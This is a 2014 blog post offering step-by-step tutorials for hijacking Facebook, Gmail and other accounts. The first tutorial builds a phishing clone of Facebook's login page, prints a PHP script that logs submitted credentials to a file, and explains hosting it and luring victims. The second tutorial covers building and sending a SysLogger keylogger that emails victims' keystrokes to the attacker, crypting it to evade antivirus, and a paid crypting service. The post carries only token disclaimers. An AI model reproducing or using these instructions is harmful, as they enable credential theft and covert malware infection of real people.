Saturday, 4 January 2014

How to hack facebook gmail yahoo instagram pinternet idxx by Phishing in 2 easy


So lets get started..:)

What is Phishing?

Phishing is a technique used by hackers in which they make a fake login page and then they grab the serious information from their victims :D

It’s a very easy way to hack  facebook,yahoo,hotmail,gmail,aol etc accounts and it works very well !
All you need to do is to make a phishing page of the login pages of  facebook/gmail etc (which you want to hack) and then tell your victim to login there and once he/she does,you get his/her id  (whoaa!).. :D

Example fb 

How to hack a facebook account using phishing?

For hacking facebook with phishing,you need to do two things.

  1. Creating a Facebook Phishing Page i.e a clone of facebook login page.
  2. Uploading  the phishing page to a free webhost.

How to make a Facebook Phishing page?

For making a facebook phishing page follow the steps below :

  • Go to www.facebook.com/login ,wait until the page loads properly and then copy the page source (for copying the page source, right click anywhere on the page,click on view page source and copy the whole piece of code)
  • Once you copy the page source so paste it in a notepad file.
  • Next search for  action=”/login.php?login_attempt=1″ in that notepad file and change it with action =“pass.php”.
  • Then save that notepad file as an html file i.e index.html
  • Now open a new notepad file,copy the below code and save the file as pass.php

<?php

header (‘Location: https://www.facebook.com’);
$handle = fopen(“passwords.html”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>

How to Upload Phishing Page to a  Webhost ?

Now,you have to upload your phishing page along with that pass.php file  to a webhost.For this search google for free webhosts and you will find many.

But the one I recon is 000webhost.com  .

  • So go to 000webhost.com , click on sign up and register an account there. During registeration,select the option “Use a free subdomain” and pick up a free subdomain.
  • After registering,you will recieve a message from 000webhost to your email in which there will be your login,ftp account information etc.
  • Next login using that account, click on File Manager,go to public_html directory and upload those two files i.e index.html and pass.php

 

Now all you have to do is to give the link of your free subdomain (which you selected during registration) to your victim and tell him/her to login there.

Once he/she does you will get his/her password in a passwords.html file.For viewing the passwords,you will have to go to :
www.yoursite.com/passwords.html  (Change yoursite.com with that free subdomain )

That’s it, so simple and easy!

You can hack many facebook accounts using this phishing technique but I really don’t want that this should be used for illegal purposes.All that you are gonna do with it is at your own risk/choice and I won’t be responsible for any of your actions.

Hack Facebook account using syslogger keylogger


Hacking-via-keylogger

I’m here again with a new tutorial about how to hack a facebook account using a keylogger.It’s very simple and easy.All you need to do is to read the below tutorial carefully!..:)

Okay,so lets get started !

What’s a keylogger ?

Keylogger is a program which you will send to your victim and once he/she opens it.It will record all the keystrokes  (i.e what he/she types on keyboard) and then it will send those keystrokes to your email account.

How to send keylogger to your Victim?

For this,first you need to download a keylogger software which has the feature of remote installation.There are many keyloggers available on internet (you can google them) but the one I recommend is SysLogger.

It’s an epic keylogger.It has many features like stealing saved passwords,deleting the victim’s cookies,disabling task manager etc.. And the best thing about it is that it’s totally free! :D
It is created by a coder of HF (HackForums).

  • So download syslogger  keylogger from here.
  • When you download it,you will get a rar file.Extract its contents.
  • Next,open Syslogger Builder.exe and do all the settings like this :

How-to-use-syslogger

  • Then click on “Build Server” and it will ask  you that where you want to save your server and which name do you want to give it.
  • So give it any name and save it.Now you will get your server file.This is the file that you will send to your victim.

That’s it!

Next,send this file to your friend or anyone you want to hack  via skype or something and once he/she opens it,you will start receiving his/her keylogs to your gmail account (that account which’s email and pass you entered while building your server)  :D.

You can also use a crypter to crypt your keylogger and bypass antivirus detections.
Update : I’m offering a crypting service now. The crypt will be totally FUD. You can check theServices Page for it .

The logic behind using a keylogger is that during this your victim might login to his/her  facebook account and when he/she does so that keystrokes will be also recorded and will be sent to your gmail account and once they are sent so you know what happens xD !

You can use your evil mind then :)

Okay so that was about the use of keyloggers etc i.e. how do they work and how to hack a Facebook account via keylogger.

You can also hack gmail,yahoo,aol etc and much more accounts like this :D

Anyway,bye and take care !

P.S I don’t want that this tutorial should be used for illegal purposes and I will not be responsible for the actions you take after reading this tutorial.